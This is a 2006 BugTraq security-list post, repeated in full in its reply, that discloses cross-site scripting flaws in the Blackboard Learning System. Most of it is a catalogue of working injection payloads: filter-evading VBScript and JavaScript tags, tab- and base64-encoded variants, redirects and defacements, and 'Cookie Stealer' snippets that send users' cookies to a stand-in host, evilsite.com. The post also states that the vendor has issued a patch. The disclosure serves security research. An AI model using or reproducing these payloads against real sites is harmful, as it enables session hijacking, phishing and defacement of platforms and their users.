BugTraq
Back to list
|
Post reply
BlackBoard Multiple Vulnerabilities (XSS)
Aug 22 2006 09:40PM
Pr070n gmail com
(1 replies)
------------------------------------------------------------------------
-----------------
Found by: PrOtOn & digi7al64
Date: May 20th 2006
Critical Level: High
Type: Multiple Cross Site Scripting (XSS) vunerabilities
------------------------------------------------------------------------
------------------
Software:
Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23
------------------------------------------------------------------------
------------------
Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal
cookies, deface the site using frame busters or even redirect to external sites for phishing purposes.
If you have limited access, then a simple post into the Discussion Board using the right
tags with the right code (provided below) will execute the vulnerability(ies).
------------------------------------------------------------------------
-------------------
About:
Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc)
------------------------------------------------------------------------
-------------------
Vulnerabilities:
Defacement (FrameBuster)
-------------------------
<meta http-equiv="refresh"
content="15;url= http://evilsite.com">
Defacement (FrameBuster)
-------------------------
<iframe src=" http://evilsite.com" width=100
height=100></iframe>
Defacement (IE ONLY)
-------------------------
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
Defacement (IE ONLY)
-------------------------
<link rel="stylesheet"
href=vbscript:document.write("defaced_by_insane_script_kiddies")>
<img src=vb script:document.write("defaced_by_insane_script_kiddies")>
Cookie Stealer (IE ONLY)
-------------------------
<img
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
<img src="vbscript:window.focus ()"style=visibility:hidden/>
<img src="vbscript: window.close()"style=visibility:hidden/>
Cookie Stealer (IE ONLY)
-------------------------
<link rel="stylesheet"
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cooki
e)">
Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
<img
src="jav ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (html encoded - IE ONLY)
-------------------------
<img
src='javascripdocument.images[
1].s
rc=" http://evilsite.com"+document.cookie;'<img
src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (tabs - IE ONLY)
-------------------------
<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
<body background="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
<div style="background-image: url(jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"
>
Cookie Stealer (firefox)
-------------------------
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l
0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
Cookie Stealer (firefox - click to work)
-------------------------
<a
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20v
Y29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>
------------------------------------------------------------------------
---------------------
Disclaimer:
Myself or any other person involved with this discovery will not be responsible for what you
do with this information.
Blackboard developers have been contacted by me and a patch has been released according to them.
------------------------------------------------------------------------
-----------------------
Shout Outs:
r0xes, criticalsecurity(dot)net, Infowar(dot)com
------------------------------------------------------------------------
------------------------
Contact:
Pr070n(at)gmail(dot)com
Digi7al64(at)gmail(dot)com
------------------------------------------------------------------------
-------------------------
[ reply ]
Re: BlackBoard Multiple Vulnerabilities (XSS)
Aug 23 2006 12:57AM
C. Hamby (fixer gci net)
Privacy Statement
Copyright 2010, SecurityFocus
-----------------
Found by: PrOtOn & digi7al64
Date: May 20th 2006
Critical Level: High
Type: Multiple Cross Site Scripting (XSS) vunerabilities
------------------------------------------------------------------------
------------------
Software:
Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23
------------------------------------------------------------------------
------------------
Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal
cookies, deface the site using frame busters or even redirect to external sites for phishing purposes.
If you have limited access, then a simple post into the Discussion Board using the right
tags with the right code (provided below) will execute the vulnerability(ies).
------------------------------------------------------------------------
-------------------
About:
Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc)
------------------------------------------------------------------------
-------------------
Vulnerabilities:
Defacement (FrameBuster)
-------------------------
<meta http-equiv="refresh"
content="15;url= http://evilsite.com">
Defacement (FrameBuster)
-------------------------
<iframe src=" http://evilsite.com" width=100
height=100></iframe>
Defacement (IE ONLY)
-------------------------
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
Defacement (IE ONLY)
-------------------------
<link rel="stylesheet"
href=vbscript:document.write("defaced_by_insane_script_kiddies")>
<img src=vb script:document.write("defaced_by_insane_script_kiddies")>
Cookie Stealer (IE ONLY)
-------------------------
<img
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
<img src="vbscript:window.focus ()"style=visibility:hidden/>
<img src="vbscript: window.close()"style=visibility:hidden/>
Cookie Stealer (IE ONLY)
-------------------------
<link rel="stylesheet"
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cooki
e)">
Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
<img
src="jav ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (html encoded - IE ONLY)
-------------------------
<img
src='javascripdocument.images[
1].s
rc=" http://evilsite.com"+document.cookie;'<img
src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (tabs - IE ONLY)
-------------------------
<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"s
tyle=visibility:hidden/>
Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
<body background="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
<div style="background-image: url(jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"
>
Cookie Stealer (firefox)
-------------------------
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l
0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
Cookie Stealer (firefox - click to work)
-------------------------
<a
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20v
Y29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>
------------------------------------------------------------------------
---------------------
Disclaimer:
Myself or any other person involved with this discovery will not be responsible for what you
do with this information.
Blackboard developers have been contacted by me and a patch has been released according to them.
------------------------------------------------------------------------
-----------------------
Shout Outs:
r0xes, criticalsecurity(dot)net, Infowar(dot)com
------------------------------------------------------------------------
------------------------
Contact:
Pr070n(at)gmail(dot)com
Digi7al64(at)gmail(dot)com
------------------------------------------------------------------------
-------------------------
[ reply ]